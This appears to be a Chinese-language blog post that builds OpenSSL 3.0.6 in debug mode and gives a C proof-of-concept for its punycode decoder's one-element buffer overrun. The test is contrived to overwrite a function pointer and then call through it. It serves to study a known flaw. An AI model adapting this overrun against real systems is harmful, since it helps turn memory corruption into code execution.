透過這個漏洞才知道原來域名可以用中文啊~~~
非 ASCII 的國際化域名 (IDN) 會先依 RFC 3492 轉成 punycode（純 ASCII 的 `xn--…` 標籤）再拿去做查詢與比對；下面的測試程式就是在示範 OpenSSL 3.0.6 自帶的 punycode 解碼器，在解出的 code point 比呼叫端給的緩衝區多一個時，會把那一個寫到緩衝區後面。原理上還蠻有趣的ㄏㄏ
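# Fetch and build a debug OpenSSL 3.0.6 tree for the punycode overrun test.
# NOTE(review): the release zip is fetched over HTTPS but not otherwise verified;
# for anything beyond a throw-away lab, check it against the published tag /
# release signature before building.
wget 'https://github.com/openssl/openssl/archive/refs/tags/openssl-3.0.6.zip'
unzip openssl-3.0.6.zip              # the original page jumped straight to `mv`; the archive has to be extracted first
mv openssl-openssl-3.0.6 openssl-3.0.6
cd openssl-3.0.6
mkdir -p build
cd build                             # every later `../config` / `../crypto/...` path assumes cwd is this directory
../config -v --prefix=/opt/openssl-3.0.6 --openssldir="$HOME/openssl-3.0.6" --debug
make
sudo make install
ldd /opt/openssl-3.0.6/bin/openssl   # confirm which libcrypto/libssl the installed binary resolves to
# NOTE(review): the original page ran `sudo ldconfig /opt/openssl-3.0.6/lib64/`.  That registers a
# deliberately vulnerable debug libcrypto.so.3 in the system loader cache, where any binary that
# links libcrypto.so.3 without an rpath may pick it up.  Scope the override to this shell instead:
export LD_LIBRARY_PATH=/opt/openssl-3.0.6/lib64
ldd /opt/openssl-3.0.6/bin/openssl   # re-check: the libraries should now resolve to /opt/openssl-3.0.6/lib64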
#include <stdio.h> //add include .h file
#include <string.h>
#include "crypto/punycode.h"
#include "internal/nelem.h"
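/* Signature of the "canary" function pointers around the buffer; puts() fits it. */
typedef int (*EmbeddedFunc)(const char *);

/*
 * Victim layout for the overrun test: a fixed-size decode buffer sandwiched
 * between two function pointers.  A decoder that writes one element past
 * `decoded` lands on whatever follows the array.
 *
 * NOTE(review): on an LP64 target the 28-byte array is followed by 4 bytes
 * of padding before `ofc` (8-byte pointer alignment), so a one-element spill
 * hits padding there; on an ILP32 build `ofc` immediately follows the array.
 * That is presumably why the page builds both -m64 and -m32 variants.
 *
 * The slots are unsigned so they match the `out[]` code-point table in the
 * test (and, presumably, the decoder's output pointer type - confirm against
 * crypto/punycode.h); the original `int` drew a pointer-sign warning.
 */
struct contrived_example {
    EmbeddedFunc ifc;        /* canary before the buffer; expected to stay intact */
    unsigned int decoded[7]; /* one slot fewer than the 8 code points the test expects */
    EmbeddedFunc ofc;        /* canary after the buffer: the overrun target */
};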
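/*
 * Dump the canary function pointers and the decode buffer.
 *
 * Only the in-bounds slots of ex->decoded are read.  `expected` may be longer
 * than the buffer: the extra entries are the code points that have no slot to
 * land in - exactly what the overrun test relies on - so they are reported
 * without reading past the array (the original loop read decoded[7], which
 * is itself out of bounds).
 */
static void dump_state(const struct contrived_example *ex,
                       const unsigned int *expected, unsigned int n_expected)
{
    const unsigned int n_slots = OSSL_NELEM(ex->decoded);
    unsigned int i;

    printf("before func address:%p.\n", (void *)ex->ifc);
    printf("after func address:%p.\n", (void *)ex->ofc);
    for (i = 0; i < n_expected; i++) {
        if (i < n_slots)
            printf("decode:%02x out:%02x.\n", ex->decoded[i], expected[i]);
        else
            printf("decode:(no slot for index %u) out:%02x.\n", i, expected[i]);
    }
}

/*
 * Overrun test for ossl_punycode_decode().
 *
 * `in` is a punycode label whose expected decoding (`out`) is 8 code points,
 * but it is decoded into ex.decoded, which holds only 7; bsize hands that
 * capacity to the decoder (it is passed by address, so the decoder may also
 * update it - confirm the in/out semantics in crypto/punycode.h).  The test
 * expects a decoder that honours the capacity to leave ex.ofc untouched, and
 * one that is off by one to write out[7] over whatever follows the array.
 * The dumps before and after the call show whether ex.ofc changed; the final
 * calls through ex.ifc/ex.ofc show the consequence (a clobbered ex.ofc will
 * crash or jump elsewhere - that crash is the demonstration, so it is not
 * suppressed here).
 *
 * NOTE(review): whether out[7] lands on ex.ofc depends on struct layout; on
 * an LP64 build there are 4 bytes of padding after the 28-byte array, so the
 * 32-bit build is the one where the spill reaches ofc.
 *
 * Returns 1 unconditionally (kept for compatibility with the original test).
 */
int test_puny_overrun_rce(void)
{
    static const unsigned int out[] = {
        0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, 0x751F
    };
    static const char *in = "3B-ww4c5e180e575a65lsy2b";
    /* Zero-initialised so the "before" dump reads defined values. */
    struct contrived_example ex = { 0 };
    unsigned int bsize = OSSL_NELEM(ex.decoded);
    int result;

    printf("bsize: %u.\n", bsize);
    ex.ifc = (EmbeddedFunc)&puts;
    ex.ofc = (EmbeddedFunc)&puts;
    printf("\n");
    dump_state(&ex, out, OSSL_NELEM(out));

    result = ossl_punycode_decode(in, strlen(in), ex.decoded, &bsize);

    printf("\n");
    /* The original discarded the return value; report it with the updated size. */
    printf("decode result:%d bsize after:%u.\n", result, bsize);
    dump_state(&ex, out, OSSL_NELEM(out));

    if (ex.ofc != (EmbeddedFunc)&puts)
        printf("ofc was overwritten (now %p): the call through it below is hijacked.\n",
               (void *)ex.ofc);

    ex.ifc("nothing to see here\n");
    ex.ofc("before to see here\n");
    return 1;
}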
/* Entry point: run the single overrun demonstration; its return value is not used. */
int main(int argc, const char *argv[])
{
    (void)argc;
    (void)argv;
    (void)test_puny_overrun_rce();
    return 0;
}
編譯測試程式（先 64-bit，再 32-bit）。請先把上面的 C 檔存成原始碼樹裡的 crypto/test_puny_overrun_rce.c，並在前面建立的 build 目錄下執行下列指令。
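# Build the test program against the vulnerable punycode.c, first 64-bit, then 32-bit.
# Assumptions: cwd is the `build` directory configured above, and the C file above has
# been saved as ../crypto/test_puny_overrun_rce.c.  The test links the punycode object
# directly and never loads libcrypto.so, so the loader setup earlier does not affect it.
#
# The flags mirror OpenSSL's own compile line for punycode.c so the internal headers
# (crypto/punycode.h, internal/nelem.h) resolve.  Most of the *_ASM defines are
# irrelevant to punycode.c and are kept only to match the original build line; the
# dependency-file options (-MMD/-MF/-MT) were dropped as they serve no purpose here.
# Tip: append -fsanitize=address to ossl_cflags to have the overrun reported at the
# faulting store instead of relying on struct layout to make it visible.
ossl_cflags=(
  -I. -Iinclude -Iproviders/common/include -Iproviders/implementations/include
  -I.. -I../include -I../providers/common/include -I../providers/implementations/include
  -DAES_ASM -DBSAES_ASM -DCMLL_ASM -DECP_NISTZ256_ASM -DGHASH_ASM -DKECCAK1600_ASM
  -DMD5_ASM -DOPENSSL_BN_ASM_GF2m -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5
  -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DPOLY1305_ASM -DSHA1_ASM -DSHA256_ASM
  -DSHA512_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DX25519_ASM
  -fPIC -pthread -Wa,--noexecstack -Wall -O0 -g
  -DOPENSSL_USE_NODELETE -DL_ENDIAN -DOPENSSL_PIC
  "-DOPENSSLDIR=\"$HOME/openssl-3.0.6\""      # the original hard-coded /home/aeifkz; config used $HOME
  '-DENGINESDIR="/opt/openssl-3.0.6/lib64/engines-3"'
  '-DMODULESDIR="/opt/openssl-3.0.6/lib64/ossl-modules"'
  -DOPENSSL_BUILDING_OPENSSL
)

# build_test ARCH_FLAG OUTPUT: compile punycode.c and the test with the same flags and link them.
build_test() {
  rm -f crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o
  gcc "${ossl_cflags[@]}" "$1" -c -o crypto/libcrypto-shlib-punycode.o ../crypto/punycode.c || return 1
  gcc "${ossl_cflags[@]}" "$1" -c -o crypto/test_puny_overrun_rce.o ../crypto/test_puny_overrun_rce.c || return 1
  gcc "$1" -o "$2" crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o
}

# --- 64-bit ---
build_test -m64 test_puny_overrun_rce

# --- 32-bit ---
# gcc-multilib must be present before any -m32 compile (the original page installed it afterwards).
sudo apt-get install gcc-multilib
# Reconfigure for a 32-bit target in a separate build directory instead of wiping the
# 64-bit one with `rm -rf build/*` (which was also relative to the wrong directory).
# Do not `make install` this tree: it would overwrite the 64-bit install under the same prefix.
mkdir -p ../build32 && cd ../build32
setarch i386 ../config -m32 linux-generic32 -v --prefix=/opt/openssl-3.0.6 --openssldir="$HOME/openssl-3.0.6" --debug
make    # as for the 64-bit tree, so the generated headers under include/ exist before compiling
build_test -m32 test_puny_overrun_rce32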